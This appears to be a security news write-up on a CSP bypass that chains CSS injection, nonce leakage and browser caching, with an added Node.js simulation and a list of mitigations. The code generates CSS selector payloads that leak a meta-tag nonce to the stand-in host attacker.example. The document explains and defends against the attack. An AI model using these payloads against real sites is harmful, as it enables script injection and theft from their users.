Browser Cache Exploit Bypasses Web Security Policy
Security researchers have identified a high-risk vulnerability that allows attackers to bypass Content Security Policy (CSP) protections by combining HTML injection with browser caching. The technique defeats nonce-based CSP by exploiting how modern browsers store and reuse cached pages, in particular the back/forward cache (bfcache) and the disk cache.
The attack begins with CSS injection to extract the nonce from the page's CSP meta tag. Browsers hide the nonce attribute of script elements from stylesheets, but a policy delivered in a meta http-equiv="Content-Security-Policy" tag keeps its nonce in the tag's content attribute, which CSS attribute selectors can still match. Using prefix-matching attribute selectors that trigger background requests to an attacker-controlled server, combined with overlapping background requests, the attacker reconstructs the full nonce one character at a time. With the nonce known, the attacker uses Cross-Site Request Forgery to update the injected payload with a script bearing that nonce, while the victim's browser still holds the original page, with the same nonce, in its cache. Through precise timing and awareness of cache partitioning, the malicious payload executes once the victim navigates back to the cached page.
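The following is an added example, not code from the report or its authors, that simulates the first stage described above: leaking a nonce out of a meta-delivered CSP with CSS attribute selectors. It runs under Node.js with no browser; the selector-matching "browser", the attacker host attacker.example, the assumed policy prefix script-src 'nonce-, and the one-character-per-round structure are all constructed for illustration. The overlapping-request optimisation the report mentions is not reproduced here; each round issues one rule per candidate character and exactly one of them fires.

```javascript
// Added example (not from the original report): simulates the CSS
// attribute-selector leak of a nonce from a meta-delivered CSP.
// Node.js only; the "browser" and the attacker endpoint are constructed stand-ins.

const POLICY_PREFIX = "script-src 'nonce-"; // assumed start of the meta tag's content
const NONCE_ALPHABET =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
const EXFIL_BASE = "https://attacker.example/leak"; // hypothetical attacker endpoint

// Escape a value for use inside a double-quoted CSS string.
function cssEscape(s) {
  return s.replace(/\\/g, "\\\\").replace(/"/g, '\\"');
}

// One round of the leak. For every candidate next character, emit a rule whose
// selector matches only if the meta tag's content starts with knownPrefix + ch.
// <meta> is display:none by default, so the first rule forces it (and <head>)
// to render; without that no background-image request is ever issued.
function buildLeakCss(knownPrefix, alphabet = NONCE_ALPHABET) {
  const rules = ["head,meta{display:block}"];
  for (const ch of alphabet) {
    const candidate = knownPrefix + ch;
    rules.push(
      `meta[http-equiv="Content-Security-Policy"][content^="${cssEscape(candidate)}"]` +
        `{background:url(${EXFIL_BASE}?p=${encodeURIComponent(candidate)})}`
    );
  }
  return rules.join("\n");
}

// Constructed stand-in for the browser's selector matching: a rule with
// [content^="X"] fires its background request when the meta content starts
// with X. Returns the URLs the attacker's server would receive.
function simulateRequests(metaContent, css) {
  const rule = /\[content\^="((?:[^"\\]|\\.)*)"\][^{]*\{[^}]*url\(([^)]*)\)/g;
  const hits = [];
  for (const m of css.matchAll(rule)) {
    const prefix = m[1].replace(/\\(.)/g, "$1");
    if (metaContent.startsWith(prefix)) hits.push(m[2]);
  }
  return hits;
}

// Drive the rounds: inject CSS, observe which request arrives, extend the
// known prefix by one character, repeat until the closing quote is reached.
function recoverNonce(metaContent, { maxRounds = 128 } = {}) {
  let known = POLICY_PREFIX;
  for (let i = 0; i < maxRounds; i++) {
    const css = buildLeakCss(known, NONCE_ALPHABET + "'");
    const hits = simulateRequests(metaContent, css);
    if (hits.length !== 1) {
      throw new Error(`expected exactly one request, got ${hits.length} after "${known}"`);
    }
    // The attacker's server reads the candidate back from the query string.
    known = new URL(hits[0]).searchParams.get("p");
    if (known.endsWith("'")) {
      return known.slice(POLICY_PREFIX.length, -1);
    }
  }
  throw new Error("nonce longer than maxRounds");
}

// Constructed victim page: the policy a site might place in
// <meta http-equiv="Content-Security-Policy" content="..."> with a fresh nonce.
const SAMPLE_META_CONTENT =
  "script-src 'nonce-R4nd0mN0nc3+/=' 'strict-dynamic'; object-src 'none'";

console.log("recovered nonce:", recoverNonce(SAMPLE_META_CONTENT));
```

The point of the simulation is the oracle: the page never sends the nonce anywhere itself, yet each round's single background request tells the attacker which candidate prefix matched. The same selectors would not work against a script element's nonce attribute, which the browser blanks when the policy arrives in a header, which is why the meta tag is the target.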
This method undermines one of the web's core defenses against XSS. Security teams should reassess their CSP deployments: deliver the policy in the Content-Security-Policy response header rather than a meta tag, so the nonce never sits in a DOM attribute that an injected stylesheet can read; send Cache-Control: no-store on nonce-bearing responses so a page whose nonce may already have leaked is not served again from cache; and treat a nonce as valid for a single response only.
Read the full official report: New Sophisticated Attack Bypasses Content Security Policy Using HTML-Injection Technique
